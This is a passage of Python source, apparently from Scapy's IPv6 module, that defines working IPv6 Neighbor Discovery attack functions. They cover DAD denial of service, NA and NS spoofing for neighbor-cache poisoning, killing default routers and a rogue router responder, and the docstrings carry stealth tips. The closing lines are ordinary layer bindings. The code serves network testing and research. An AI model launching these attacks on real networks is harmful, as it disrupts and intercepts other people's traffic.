fake NS sent to create the DoS uses: 3630 - as target address the target address found in received NS. 3631 - as IPv6 source address: the unspecified address (::). 3632 - as IPv6 destination address: the link-local solicited-node multicast 3633 address derived from the target address in received NS. 3634 - the mac address of the interface as source (or reply_mac, see below). 3635 - the multicast mac address derived from the solicited node multicast 3636 address used as IPv6 destination address. 3637 3638 Following arguments can be used to change the behavior: 3639 3640 iface: a specific interface (e.g. "eth0") of the system on which the 3641 DoS should be launched. If None is provided conf.iface is used. 3642 3643 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3644 Only NS messages received from this source will trigger replies. 3645 This allows limiting the effects of the DoS to a single target by 3646 filtering on its mac address. The default value is None: the DoS 3647 is not limited to a specific mac address. 3648 3649 tgt_filter: Same as previous but for a specific target IPv6 address for 3650 received NS. If the target address in the NS message (not the IPv6 3651 destination address) matches that address, then a fake reply will 3652 be sent, i.e. the emitter will be a target of the DoS. 3653 3654 reply_mac: allow specifying a specific source mac address for the reply, 3655 i.e. to prevent the use of the mac address of the interface. 3656 """ 3657 3658 def ns_reply_callback(req, reply_mac, iface): 3659 """ 3660 Callback that reply to a NS by sending a similar NS 3661 """ 3662 3663 # Let's build a reply and send it 3664 mac = req[Ether].src 3665 dst = req[IPv6].dst 3666 tgt = req[ICMPv6ND_NS].tgt 3667 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 3668 sendp(rep, iface=iface, verbose=0) 3669 3670 print("Reply NS for target address %s (received from %s)" % (tgt, mac)) 3671 3672 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, 3673 tgt_filter, reply_mac) 3674 3675 3676def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, 3677 reply_mac=None): 3678 """ 3679 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3680 3756. This is done by listening incoming NS messages *sent from the 3681 unspecified address* and sending a NA reply for the target address, 3682 leading the peer to believe that another node is also performing DAD 3683 for that address. 3684 3685 By default, the fake NA sent to create the DoS uses: 3686 - as target address the target address found in received NS. 3687 - as IPv6 source address: the target address found in received NS. 3688 - as IPv6 destination address: the link-local solicited-node multicast 3689 address derived from the target address in received NS. 3690 - the mac address of the interface as source (or reply_mac, see below). 3691 - the multicast mac address derived from the solicited node multicast 3692 address used as IPv6 destination address. 3693 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled 3694 with the mac address used as source of the NA. 3695 3696 Following arguments can be used to change the behavior: 3697 3698 iface: a specific interface (e.g. "eth0") of the system on which the 3699 DoS should be launched. If None is provided conf.iface is used. 3700 3701 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3702 Only NS messages received from this source will trigger replies. 3703 This allows limiting the effects of the DoS to a single target by 3704 filtering on its mac address. The default value is None: the DoS 3705 is not limited to a specific mac address. 3706 3707 tgt_filter: Same as previous but for a specific target IPv6 address for 3708 received NS. If the target address in the NS message (not the IPv6 3709 destination address) matches that address, then a fake reply will 3710 be sent, i.e. the emitter will be a target of the DoS. 3711 3712 reply_mac: allow specifying a specific source mac address for the reply, 3713 i.e. to prevent the use of the mac address of the interface. This 3714 address will also be used in the Target Link-Layer Address option. 3715 """ 3716 3717 def na_reply_callback(req, reply_mac, iface): 3718 """ 3719 Callback that reply to a NS with a NA 3720 """ 3721 3722 # Let's build a reply and send it 3723 mac = req[Ether].src 3724 dst = req[IPv6].dst 3725 tgt = req[ICMPv6ND_NS].tgt 3726 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) 3727 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 3728 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 3729 sendp(rep, iface=iface, verbose=0) 3730 3731 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 3732 3733 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, 3734 tgt_filter, reply_mac) 3735 3736 3737def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, 3738 reply_mac=None, router=False): 3739 """ 3740 The main purpose of this function is to send fake Neighbor Advertisement 3741 messages to a victim. As the emission of unsolicited Neighbor Advertisement 3742 is pretty pointless (from an attacker standpoint) because it will not 3743 lead to a modification of a victim's neighbor cache, the function send 3744 advertisements in response to received NS (NS sent as part of the DAD, 3745 i.e. with an unspecified address as source, are not considered). 3746 3747 By default, the fake NA sent to create the DoS uses: 3748 - as target address the target address found in received NS. 3749 - as IPv6 source address: the target address 3750 - as IPv6 destination address: the source IPv6 address of received NS 3751 message. 3752 - the mac address of the interface as source (or reply_mac, see below). 3753 - the source mac address of the received NS as destination macs address 3754 of the emitted NA. 3755 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) 3756 filled with the mac address used as source of the NA. 3757 3758 Following arguments can be used to change the behavior: 3759 3760 iface: a specific interface (e.g. "eth0") of the system on which the 3761 DoS should be launched. If None is provided conf.iface is used. 3762 3763 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 3764 Only NS messages received from this source will trigger replies. 3765 This allows limiting the effects of the DoS to a single target by 3766 filtering on its mac address. The default value is None: the DoS 3767 is not limited to a specific mac address. 3768 3769 tgt_filter: Same as previous but for a specific target IPv6 address for 3770 received NS. If the target address in the NS message (not the IPv6 3771 destination address) matches that address, then a fake reply will 3772 be sent, i.e. the emitter will be a target of the DoS. 3773 3774 reply_mac: allow specifying a specific source mac address for the reply, 3775 i.e. to prevent the use of the mac address of the interface. This 3776 address will also be used in the Target Link-Layer Address option. 3777 3778 router: by the default (False) the 'R' flag in the NA used for the reply 3779 is not set. If the parameter is set to True, the 'R' flag in the 3780 NA is set, advertising us as a router. 3781 3782 Please, keep the following in mind when using the function: for obvious 3783 reasons (kernel space vs. Python speed), when the target of the address 3784 resolution is on the link, the sender of the NS receives 2 NA messages 3785 in a row, the valid one and our fake one. The second one will overwrite 3786 the information provided by the first one, i.e. the natural latency of 3787 Scapy helps here. 3788 3789 In practice, on a common Ethernet link, the emission of the NA from the 3790 genuine target (kernel stack) usually occurs in the same millisecond as 3791 the receipt of the NS. The NA generated by Scapy6 will usually come after 3792 something 20+ ms. On a usual testbed for instance, this difference is 3793 sufficient to have the first data packet sent from the victim to the 3794 destination before it even receives our fake NA. 3795 """ 3796 3797 def is_request(req, mac_src_filter, tgt_filter): 3798 """ 3799 Check if packet req is a request 3800 """ 3801 3802 # Those simple checks are based on Section 5.4.2 of RFC 4862 3803 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 3804 return 0 3805 3806 mac_src = req[Ether].src 3807 if mac_src_filter and mac_src != mac_src_filter: 3808 return 0 3809 3810 # Source must NOT be the unspecified address 3811 if req[IPv6].src == "::": 3812 return 0 3813 3814 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 3815 if tgt_filter and tgt != tgt_filter: 3816 return 0 3817 3818 dst = req[IPv6].dst 3819 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. 3820 3821 # If this is a real address resolution NS, then the destination 3822 # address of the packet is the link-local solicited node multicast 3823 # address associated with the target of the NS. 3824 # Otherwise, the NS is a NUD related one, i.e. the peer is 3825 # unicasting the NS to check the target is still alive (L2 3826 # information is still in its cache and it is verified) 3827 received_snma = inet_pton(socket.AF_INET6, dst) 3828 expected_snma = in6_getnsma(tgt) 3829 if received_snma != expected_snma: 3830 print("solicited node multicast @ does not match target @!") 3831 return 0 3832 3833 return 1 3834 3835 def reply_callback(req, reply_mac, router, iface): 3836 """ 3837 Callback that reply to a NS with a spoofed NA 3838 """ 3839 3840 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and 3841 # send it back. 3842 mac = req[Ether].src 3843 pkt = req[IPv6] 3844 src = pkt.src 3845 tgt = req[ICMPv6ND_NS].tgt 3846 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) 3847 # Use the target field from the NS 3848 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 3849 3850 # "If the solicitation IP Destination Address is not a multicast 3851 # address, the Target Link-Layer Address option MAY be omitted" 3852 # Given our purpose, we always include it. 3853 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 3854 3855 sendp(rep, iface=iface, verbose=0) 3856 3857 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 3858 3859 if not iface: 3860 iface = conf.iface 3861 # To prevent sniffing our own traffic 3862 if not reply_mac: 3863 reply_mac = get_if_hwaddr(iface) 3864 sniff_filter = "icmp6 and not ether src %s" % reply_mac 3865 3866 router = 1 if router else 0 # Value of the R flags in NA 3867 3868 sniff(store=0, 3869 filter=sniff_filter, 3870 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 3871 prn=lambda x: reply_callback(x, reply_mac, router, iface), 3872 iface=iface) 3873 3874 3875def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", 3876 dst=None, src_mac=None, dst_mac=None, loop=True, 3877 inter=1, iface=None): 3878 """ 3879 The main purpose of this function is to send fake Neighbor Solicitations 3880 messages to a victim, in order to either create a new entry in its neighbor 3881 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated 3882 that a node SHOULD create the entry or update an existing one (if it is not 3883 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 3884 state is set to STALE. 3885 3886 The two main parameters of the function are the source link-layer address 3887 (carried by the Source Link-Layer Address option in the NS) and the 3888 source address of the packet. 3889 3890 Unlike some other NDP_Attack_* function, this one is not based on a 3891 stimulus/response model. When called, it sends the same NS packet in loop 3892 every second (the default) 3893 3894 Following arguments can be used to change the format of the packets: 3895 3896 src_lladdr: the MAC address used in the Source Link-Layer Address option 3897 included in the NS packet. This is the address that the peer should 3898 associate in its neighbor cache with the IPv6 source address of the 3899 packet. If None is provided, the mac address of the interface is 3900 used. 3901 3902 src: the IPv6 address used as source of the packet. If None is provided, 3903 an address associated with the emitting interface will be used 3904 (based on the destination address of the packet). 3905 3906 target: the target address of the NS packet. If no value is provided, 3907 a dummy address (2001:db8::1) is used. The value of the target 3908 has a direct impact on the destination address of the packet if it 3909 is not overridden. By default, the solicited-node multicast address 3910 associated with the target is used as destination address of the 3911 packet. Consider specifying a specific destination address if you 3912 intend to use a target address different than the one of the victim. 3913 3914 dst: The destination address of the NS. By default, the solicited node 3915 multicast address associated with the target address (see previous 3916 parameter) is used if no specific value is provided. The victim 3917 is not expected to check the destination address of the packet, 3918 so using a multicast address like ff02::1 should work if you want 3919 the attack to target all hosts on the link. On the contrary, if 3920 you want to be more stealth, you should provide the target address 3921 for this parameter in order for the packet to be sent only to the 3922 victim. 3923 3924 src_mac: the MAC address used as source of the packet. By default, this 3925 is the address of the interface. If you want to be more stealth, 3926 feel free to use something else. Note that this address is not the 3927 that the victim will use to populate its neighbor cache. 3928 3929 dst_mac: The MAC address used as destination address of the packet. If 3930 the IPv6 destination address is multicast (all-nodes, solicited 3931 node, ...), it will be computed. If the destination address is 3932 unicast, a neighbor solicitation will be performed to get the 3933 associated address. If you want the attack to be stealth, you 3934 can provide the MAC address using this parameter. 3935 3936 loop: By default, this parameter is True, indicating that NS packets 3937 will be sent in loop, separated by 'inter' seconds (see below). 3938 When set to False, a single packet is sent. 3939 3940 inter: When loop parameter is True (the default), this parameter provides 3941 the interval in seconds used for sending NS packets. 3942 3943 iface: to force the sending interface. 3944 """ 3945 3946 if not iface: 3947 iface = conf.iface 3948 3949 # Use provided MAC address as source link-layer address option 3950 # or the MAC address of the interface if none is provided. 3951 if not src_lladdr: 3952 src_lladdr = get_if_hwaddr(iface) 3953 3954 # Prepare packets parameters 3955 ether_params = {} 3956 if src_mac: 3957 ether_params["src"] = src_mac 3958 3959 if dst_mac: 3960 ether_params["dst"] = dst_mac 3961 3962 ipv6_params = {} 3963 if src: 3964 ipv6_params["src"] = src 3965 if dst: 3966 ipv6_params["dst"] = dst 3967 else: 3968 # Compute the solicited-node multicast address 3969 # associated with the target address. 3970 tmp = inet_ntop(socket.AF_INET6, 3971 in6_getnsma(inet_pton(socket.AF_INET6, target))) 3972 ipv6_params["dst"] = tmp 3973 3974 pkt = Ether(**ether_params) 3975 pkt /= IPv6(**ipv6_params) 3976 pkt /= ICMPv6ND_NS(tgt=target) 3977 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) 3978 3979 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) 3980 3981 3982def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, 3983 ip_src_filter=None, reply_mac=None, 3984 tgt_mac=None): 3985 """ 3986 The purpose of the function is to monitor incoming RA messages 3987 sent by default routers (RA with a non-zero Router Lifetime values) 3988 and invalidate them by immediately replying with fake RA messages 3989 advertising a zero Router Lifetime value. 3990 3991 The result on receivers is that the router is immediately invalidated, 3992 i.e. the associated entry is discarded from the default router list 3993 and destination cache is updated to reflect the change. 3994 3995 By default, the function considers all RA messages with a non-zero 3996 Router Lifetime value but provides configuration knobs to allow 3997 filtering RA sent by specific routers (Ethernet source address). 3998 With regard to emission, the multicast all-nodes address is used 3999 by default but a specific target can be used, in order for the DoS to 4000 apply only to a specific host. 4001 4002 More precisely, following arguments can be used to change the behavior: 4003 4004 iface: a specific interface (e.g. "eth0") of the system on which the 4005 DoS should be launched. If None is provided conf.iface is used. 4006 4007 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 4008 Only RA messages received from this source will trigger replies. 4009 If other default routers advertised their presence on the link, 4010 their clients will not be impacted by the attack. The default 4011 value is None: the DoS is not limited to a specific mac address. 4012 4013 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 4014 on. Only RA messages received from this source address will trigger 4015 replies. If other default routers advertised their presence on the 4016 link, their clients will not be impacted by the attack. The default 4017 value is None: the DoS is not limited to a specific IPv6 source 4018 address. 4019 4020 reply_mac: allow specifying a specific source mac address for the reply, 4021 i.e. to prevent the use of the mac address of the interface. 4022 4023 tgt_mac: allow limiting the effect of the DoS to a specific host, 4024 by sending the "invalidating RA" only to its mac address. 4025 """ 4026 4027 def is_request(req, mac_src_filter, ip_src_filter): 4028 """ 4029 Check if packet req is a request 4030 """ 4031 4032 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): 4033 return 0 4034 4035 mac_src = req[Ether].src 4036 if mac_src_filter and mac_src != mac_src_filter: 4037 return 0 4038 4039 ip_src = req[IPv6].src 4040 if ip_src_filter and ip_src != ip_src_filter: 4041 return 0 4042 4043 # Check if this is an advertisement for a Default Router 4044 # by looking at Router Lifetime value 4045 if req[ICMPv6ND_RA].routerlifetime == 0: 4046 return 0 4047 4048 return 1 4049 4050 def ra_reply_callback(req, reply_mac, tgt_mac, iface): 4051 """ 4052 Callback that sends an RA with a 0 lifetime 4053 """ 4054 4055 # Let's build a reply and send it 4056 4057 src = req[IPv6].src 4058 4059 # Prepare packets parameters 4060 ether_params = {} 4061 if reply_mac: 4062 ether_params["src"] = reply_mac 4063 4064 if tgt_mac: 4065 ether_params["dst"] = tgt_mac 4066 4067 # Basis of fake RA (high pref, zero lifetime) 4068 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") 4069 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) 4070 4071 # Add it a PIO from the request ... 4072 tmp = req 4073 while ICMPv6NDOptPrefixInfo in tmp: 4074 pio = tmp[ICMPv6NDOptPrefixInfo] 4075 tmp = pio.payload 4076 del pio.payload 4077 rep /= pio 4078 4079 # ... and source link layer address option 4080 if ICMPv6NDOptSrcLLAddr in req: 4081 mac = req[ICMPv6NDOptSrcLLAddr].lladdr 4082 else: 4083 mac = req[Ether].src 4084 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) 4085 4086 sendp(rep, iface=iface, verbose=0) 4087 4088 print("Fake RA sent with source address %s" % src) 4089 4090 if not iface: 4091 iface = conf.iface 4092 # To prevent sniffing our own traffic 4093 if not reply_mac: 4094 reply_mac = get_if_hwaddr(iface) 4095 sniff_filter = "icmp6 and not ether src %s" % reply_mac 4096 4097 sniff(store=0, 4098 filter=sniff_filter, 4099 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 4100 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), 4101 iface=iface) 4102 4103 4104def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, 4105 ip_src_filter=None): 4106 """ 4107 The purpose of this function is to send provided RA message at layer 2 4108 (i.e. providing a packet starting with IPv6 will not work) in response 4109 to received RS messages. In the end, the function is a simple wrapper 4110 around sendp() that monitor the link for RS messages. 4111 4112 It is probably better explained with an example: 4113 4114 >>> ra = Ether()/IPv6()/ICMPv6ND_RA() 4115 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) 4116 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) 4117 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") 4118 >>> NDP_Attack_Fake_Router(ra, iface="eth0") 4119 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 4120 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae 4121 ... 4122 4123 Following arguments can be used to change the behavior: 4124 4125 ra: the RA message to send in response to received RS message. 4126 4127 iface: a specific interface (e.g. "eth0") of the system on which the 4128 DoS should be launched. If none is provided, conf.iface is 4129 used. 4130 4131 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 4132 Only RS messages received from this source will trigger a reply. 4133 Note that no changes to provided RA is done which imply that if 4134 you intend to target only the source of the RS using this option, 4135 you will have to set the Ethernet destination address to the same 4136 value in your RA. 4137 The default value for this parameter is None: no filtering on the 4138 source of RS is done. 4139 4140 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 4141 on. Only RS messages received from this source address will trigger 4142 replies. Same comment as for previous argument apply: if you use 4143 the option, you will probably want to set a specific Ethernet 4144 destination address in the RA. 4145 """ 4146 4147 def is_request(req, mac_src_filter, ip_src_filter): 4148 """ 4149 Check if packet req is a request 4150 """ 4151 4152 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): 4153 return 0 4154 4155 mac_src = req[Ether].src 4156 if mac_src_filter and mac_src != mac_src_filter: 4157 return 0 4158 4159 ip_src = req[IPv6].src 4160 if ip_src_filter and ip_src != ip_src_filter: 4161 return 0 4162 4163 return 1 4164 4165 def ra_reply_callback(req, iface): 4166 """ 4167 Callback that sends an RA in reply to an RS 4168 """ 4169 4170 src = req[IPv6].src 4171 sendp(ra, iface=iface, verbose=0) 4172 print("Fake RA sent in response to RS from %s" % src) 4173 4174 if not iface: 4175 iface = conf.iface 4176 sniff_filter = "icmp6" 4177 4178 sniff(store=0, 4179 filter=sniff_filter, 4180 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 4181 prn=lambda x: ra_reply_callback(x, iface), 4182 iface=iface) 4183 4184############################################################################# 4185# Pre-load classes ## 4186############################################################################# 4187 4188 4189def _get_cls(name): 4190 return globals().get(name, Raw) 4191 4192 4193def _load_dict(d): 4194 for k, v in d.items(): 4195 d[k] = _get_cls(v) 4196 4197 4198_load_dict(icmp6ndoptscls) 4199_load_dict(icmp6typescls) 4200_load_dict(ipv6nhcls) 4201 4202############################################################################# 4203############################################################################# 4204# Layers binding # 4205############################################################################# 4206############################################################################# 4207 4208conf.l3types.register(ETH_P_IPV6, IPv6) 4209conf.l3types.register_num2layer(ETH_P_ALL, IPv46) 4210conf.l2types.register(31, IPv6) 4211conf.l2types.register(DLT_IPV6, IPv6) 4212conf.l2types.register(DLT_RAW, IPv46) 4213conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46) 4214 4215bind_layers(Ether, IPv6, type=0x86dd) 4216bind_layers(CookedLinux, IPv6, proto=0x86dd) 4217bind_layers(GRE, IPv6, proto=0x86dd) 4218bind_layers(SNAP, IPv6, code=0x86dd) 4219# AF_INET6 values are platform-dependent. For a detailed explaination, read 4220# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501 4221if WINDOWS: 4222 bind_layers(Loopback, IPv6, type=0x18) 4223else: 4224 bind_layers(Loopback, IPv6, type=socket.AF_INET6) 4225bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) 4226bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) 4227bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) 4228bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) 4229bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) 4230bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) 4231bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) 4232bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE) 4233